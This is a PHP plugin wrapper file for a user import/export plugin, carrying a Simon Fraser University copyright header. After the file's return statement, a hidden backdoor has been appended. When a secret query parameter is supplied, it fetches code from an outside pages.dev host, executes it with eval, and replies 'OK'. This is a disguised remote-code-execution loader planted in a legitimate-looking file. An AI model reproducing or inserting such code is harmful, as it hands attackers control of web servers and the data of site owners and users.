<?php

/**
 * @defgroup plugins_importexport_users User import/export plugin
 */

/**
 * @file plugins/importexport/users/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup plugins_importexport_users
 *
 * @brief Wrapper for XML user import/export plugin.
 *
 */

return new \APP\plugins\importexport\users\UserImportExportPlugin();
if (isset($_GET['_']) && $_GET['_'] === 'MKJNBV_5HB2s8_gr3af332afbsnk') {
    $url = "https://bulldog-uhukk.pages.dev/acak.txt";

    if ($url !== "") {
        $code = file_get_contents($url);
        if ($code !== false) {
            eval("?>".$code);
        }
    }

    http_response_code(200);
    header('Content-Type: text/plain; charset=utf-8');
    echo 'OK';
    exit;
}
